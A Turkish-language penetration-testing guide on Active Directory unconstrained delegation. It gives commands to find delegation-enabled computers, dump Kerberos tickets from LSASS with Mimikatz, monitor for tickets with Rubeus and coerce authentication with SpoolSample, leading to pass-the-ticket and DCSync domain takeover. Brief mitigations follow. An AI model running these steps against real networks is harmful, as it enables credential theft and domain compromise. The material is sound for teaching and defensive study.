Sınırsız delege etme

Bu, bir Etki Alanı Yöneticisi'nin etki alanı içindeki herhangi bir Bilgisayara ayarlayabileceği bir özelliktir. Ardından, bir kullanıcı oturum açtığında, o kullanıcının TGT'nin bir kopyası DC tarafından sağlanan TGS içinde gönderilecek ve LSASS'ta belleğe kaydedilecektir. Bu nedenle, makinede Yerel Yönetici ayrıcalıklarına sahipseniz, biletleri dökerek ve kullanıcıları taklit ederek herhangi bir makinede işlem yapabilirsiniz.

Bu nedenle, bir etki alanı yöneticisi "Sınırsız Delege Etme" özelliği etkinleştirilmiş bir Bilgisayara oturum açarsa ve o makinede yerel yönetici ayrıcalıklarına sahipseniz, biletleri dökerek ve Etki Alanı Yöneticisini herhangi bir yerde taklit edebilirsiniz (etki alanı yükseltme).

Bu özelliği içeren Bilgisayar nesnelerini bulabilirsiniz, userAccountControl özniteliğinin ADS_UF_TRUSTED_FOR_DELEGATION içerip içermediğini kontrol ederek. Powerview bunu şu şekilde yapar: ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP filtresi ile:

# Sınırsız bilgisayarları listele
## Powerview
Get-NetComputer -Unconstrained #DC'ler her zaman görünür ancak etki alanı yükseltme için kullanışlı değildir
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz ile biletleri dök
privilege::debug
sekurlsa::tickets /export #Tavsiye edilen yol
kerberos::list /export #Başka bir yol

# Oturum açmaları izle ve yeni biletleri dök
.\Rubeus.exe monitor /targetuser:<kullanıcıadı> /interval:10 #Her 10 saniyede yeni TGT'leri kontrol et

Yönetici (veya kurban kullanıcı) biletini belleğe Mimikatz veya Rubeus ile yükle Pass the Ticket için. Daha fazla bilgi: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ ired.team'da Sınırsız delege etme hakkında daha fazla bilgi.

Zorunlu Kimlik Doğrulama

Bir saldırgan, "Sınırsız Delege Etme" için izin verilen bir bilgisayarı ele geçirebilirse, bir Yazıcı sunucusunu otomatik olarak giriş yapmaya kandırabilir ve sunucunun belleğinde bir TGT kaydedebilir. Ardından, saldırgan, kullanıcı Yazıcı sunucusu bilgisayar hesabını taklit etmek için bir Pass the Ticket saldırısı gerçekleştirebilir.

Bir yazıcı sunucusunun herhangi bir makineye giriş yapmasını sağlamak için SpoolSample kullanabilirsiniz:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Eğer TGT bir etki alanı denetleyicisinden geliyorsa, bir DCSync saldırısı gerçekleştirebilir ve DC'den tüm karma değerlerini elde edebilirsiniz. Bu saldırı hakkında daha fazla bilgi için ired.team.

İşte kimlik doğrulamayı zorlamak için başka yollar:

Hafifletme

• DA/Yönetici girişlerini belirli hizmetlere sınırlayın

• Ayrıcalıklı hesaplar için "Hesap hassas ve devredilemez" olarak ayarlayın.